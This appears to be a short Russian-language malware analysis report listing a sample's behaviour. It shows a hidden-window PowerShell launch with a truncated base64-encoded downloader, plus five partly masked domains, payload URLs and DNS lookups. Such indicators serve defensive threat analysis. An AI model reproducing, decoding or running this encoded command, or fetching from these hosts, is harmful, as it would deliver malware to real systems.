Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcANgBfAF8AMgA9ACgAJwBDADgANwAwADEAJwArACcANgAnACsAJwA5ACcAKQA7ACQAYQBfADMAMQA0AF8APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAbQAwADQAXwA5ADIAPQAoACcAaAB0AH...
- 'se######ren.godohosting.com':80
- 'ma###ports.kz':80
- 'cn##a.tw':80
- 'de##.##uzhixiong.top':80
- 'em##ava.eu':80
- http://se######ren.godohosting.com/postureview/5Dh6609
- http://ma###ports.kz/NhsgZulkV4l2Xmd9
- http://cn##a.tw/sYnlclNQk_k
- http://de##.##uzhixiong.top/l3z2JeDP/75NVhl2Eh7p_z9Qg1a11d
- http://em##ava.eu/8z6qORzu
- http://www.em##ava.eu/8z6qORzu
- DNS ASK se######ren.godohosting.com
- DNS ASK ma###ports.kz
- DNS ASK cn##a.tw
- DNS ASK de##.##uzhixiong.top
- DNS ASK em##ava.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcANgBfAF8AMgA9ACgAJwBDADgANwAwADEAJwArACcANgAnACsAJwA5ACcAKQA7ACQAYQBfADMAMQA0AF8APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAbQAwADQAXwA5ADIAPQAoACcAaAB0AH...' (со скрытым окном)